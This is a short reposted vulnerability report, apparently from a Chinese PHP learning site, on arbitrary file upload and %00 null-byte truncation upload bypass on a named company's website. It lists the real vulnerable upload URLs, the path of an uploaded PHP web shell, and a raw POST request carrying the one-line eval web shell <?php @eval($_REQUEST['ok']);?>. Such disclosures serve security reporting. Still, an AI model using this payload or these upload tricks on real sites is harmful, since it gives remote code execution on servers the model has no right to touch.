来源:自学PHP网 时间:2015-04-17 12:00 作者: 阅读:次
[导读] 某公司任意文件上传,另外的上传页面存在欺骗上传漏洞(%00截断)..欺骗上传的,不返回路径,通过前面上传的shell去看了下,确实是上传成功了的...返回上传路径的上传页面http://zt.happi...
某公司任意文件上传,另外的上传页面存在欺骗上传漏洞(%00截断).. http://zt.happigo.com/sc/d/xiangjijie/post_pic.php#upload_ http://zt.happigo.com/sc/d/xiangjijie/uploads/2012/08/20/dc3fbca363fe2a1aaf08b38e2833f403.php
另外的页面,可以通过%00截断上传,但是不返回上传的路径,但是去路径下面看了下,确实是上传上去的了~ POST /sc/d/gougoukeaixiu/action.php?method=upload HTTP/1.1 -----------------------------7dc31fc170554 <?php @eval($_REQUEST['ok']);?> OK
另外的
http://zt.happigo.com/sc/d/apply100930/upload.html |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com